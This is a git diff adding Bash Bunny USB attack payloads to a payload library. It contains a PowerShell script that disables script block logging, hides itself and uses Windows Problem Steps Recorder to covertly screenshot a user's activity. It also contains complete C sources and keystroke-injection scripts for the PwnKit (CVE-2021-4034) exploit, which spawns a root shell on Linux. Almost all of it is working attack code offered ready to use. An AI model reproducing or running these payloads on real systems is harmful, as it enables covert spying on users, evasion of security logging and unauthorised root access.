Merge branch 'hak5:master' into master

payloads/library/credentials/win_problemstepsrecorder/README.md

@@ -0,0 +1,29 @@
+# "Microsoft Windows" Problem Steps Recorder
+
+- Title:         Win_ProblemStepsRecorder
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Credentials      
+
+## Description
+
+1) Partially avoids "PowerShell Script Block Logging".
+2) Closing of all windows.
+3) Hide "PowerShell" window.
+4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
+5) Writes the file system cache to disk.
+6) Safely eject.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly RECORDER_TIME=300
+
+
+```

payloads/library/credentials/win_problemstepsrecorder/payload.ps1

@@ -0,0 +1,50 @@
+#
+# Author:       TW-D
+# Version:      1.0
+#
+
+Param (
+    [String] $BB_VOLUME,
+    [Int] $RECORDER_TIME
+)
+
+# Partially avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Closing of all windows.
+#
+Get-Process -Name "explorer" | Stop-Process
+    
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ((Test-Path -Path "C:\Windows\System32\psr.exe")) {
+
+    $bb_loot = "${BB_VOLUME}loot\"
+    $computer_name = $env:COMPUTERNAME
+    
+    # Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
+    #
+    (C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null
+    Start-Sleep -Seconds $RECORDER_TIME
+    (C:\Windows\System32\psr.exe /stop) | Out-Null
+
+}
+
+"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
+
+# Writes the file system cache to disk.
+#
+Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
+
+# Safely eject.
+#
+(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")

payloads/library/credentials/win_problemstepsrecorder/payload.txt

@@ -0,0 +1,91 @@
+#!/bin/bash
+#
+# Title:            Win_ProblemStepsRecorder
+#
+# Description:      
+#                   Abuse of "Windows Problem Steps Recorder" 
+#                   to spy on a user's activities.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Credentials
+# Target:           Since Microsoft Windows 7 and 2008 R2
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# NOTE
+# ===============
+# Use the browser "Internet Explorer" to read the ".mht" file correctly.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Cyan inverted single blink ...................... SPECIAL
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly RECORDER_TIME=300
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
+Q ENTER
+Q DELAY 3500
+
+Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "CD \"\${BB_SWITCH}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
+Q ENTER
+Q DELAY 1500
+
+LED SPECIAL
+
+until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+rm /root/udisk/loot/done.txt
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/exploit.c

@@ -0,0 +1,21 @@
+#include <unistd.h>
+
+int main() {
+
+    char * const ARGUMENTS[] = {
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "pwnkit.so:.",
+        "PATH=GCONV_PATH=.",
+        "SHELL=PWNKIT",
+        "CHARSET=PWNKIT",
+        NULL
+    };
+
+    execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
+
+    return(0);
+
+}

payloads/library/execution/PwnKit_LPE/CVE-2021-4034_files/library.c

@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv() {}
+
+void gconv_init() {
+
+    char * const ARGUMENTS[] = {
+        "/bin/sh",
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
+        NULL
+    };
+
+    setuid(0);
+    setgid(0);
+    execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
+    exit(0);
+
+}

payloads/library/execution/PwnKit_LPE/README.md

@@ -0,0 +1,26 @@
+# PwnKit Vulnerability - Local Privilege Escalation
+
+- Title:         PwnKit Vulnerability - Local Privilege Escalation
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Execution
+- Credits:       Qualys Research Team   
+
+## Description
+
+The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
+
+[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+
+```

payloads/library/execution/PwnKit_LPE/payload.txt

@@ -0,0 +1,112 @@
+#!/bin/bash
+#
+# Title:            PwnKit Vulnerability - Local Privilege Escalation
+#
+# Description:      
+#                   The Qualys Research Team has discovered a memory corruption 
+#                   vulnerability in polkit’s pkexec, a SUID-root program that 
+#                   is installed by default on every major Linux distribution.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Execution
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.3 LTS x86_64
+# pkexec version 0.105
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN UNITY xterm
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
+Q ENTER
+Q DELAY 3500
+
+Q STRING "mkdir /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "cd /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "/usr/bin/pkexec --version"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "id"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/exploit.c

@@ -0,0 +1,21 @@
+#include <unistd.h>
+
+int main() {
+
+    char * const ARGUMENTS[] = {
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "pwnkit.so:.",
+        "PATH=GCONV_PATH=.",
+        "SHELL=PWNKIT",
+        "CHARSET=PWNKIT",
+        NULL
+    };
+
+    execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
+
+    return(0);
+
+}

payloads/library/execution/PwnKit_LPE_Compiled/CVE-2021-4034_files/library.c

@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void gconv() {}
+
+void gconv_init() {
+
+    char * const ARGUMENTS[] = {
+        "/bin/sh",
+        NULL
+    };
+
+    char * const ENVIRONMENT[] = {
+        "PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
+        NULL
+    };
+
+    setuid(0);
+    setgid(0);
+    execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
+    exit(0);
+
+}

payloads/library/execution/PwnKit_LPE_Compiled/README.md

@@ -0,0 +1,36 @@
+# PwnKit Vulnerability - Local Privilege Escalation - Compiled
+
+- Title:         PwnKit Vulnerability - Local Privilege Escalation
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Execution
+- Credits:       Qualys Research Team     
+
+## Description
+
+This is a version of the PwnKit Vulnerability Local Privilege Escalation containing pre-compiled binaries for x86_64 Linux. If you don't want to use the pre-compiled binaries or you are targetting a different architecture, please find the `PwnKit-LPE` directory.
+
+The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
+
+[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+
+```
+
+## Checksums
+
+>
+> 9e2c0af3d55192449760f1364a67f290554b98cdbe9ace9f84e6c33ea3e957eb ./CVE-2021-4034_files/pwnkit
+>
+> acd21bf70492d22317a4592551dcd4666a693b9622ddf952e63cf3ce288f3745 ./CVE-2021-4034_files/pwnkit.so
+> 

payloads/library/execution/PwnKit_LPE_Compiled/payload.txt

@@ -0,0 +1,116 @@
+#!/bin/bash
+#
+# Title:            PwnKit Vulnerability - Local Privilege Escalation
+#
+# Description:      
+#                   The Qualys Research Team has discovered a memory corruption 
+#                   vulnerability in polkit’s pkexec, a SUID-root program that 
+#                   is installed by default on every major Linux distribution.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Execution
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.3 LTS x86_64
+# pkexec version 0.105
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+RUN UNITY xterm
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
+Q ENTER
+Q DELAY 3500
+
+Q STRING "mkdir /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp pwnkit.so /tmp/pwnkit_lpe/pwnkit.so"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp pwnkit /tmp/pwnkit_lpe/pwnkit"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING "cd /tmp/pwnkit_lpe/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "/usr/bin/pkexec --version"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "chmod +x ./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "./pwnkit"
+Q ENTER
+Q DELAY 1500
+
+Q STRING "id"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0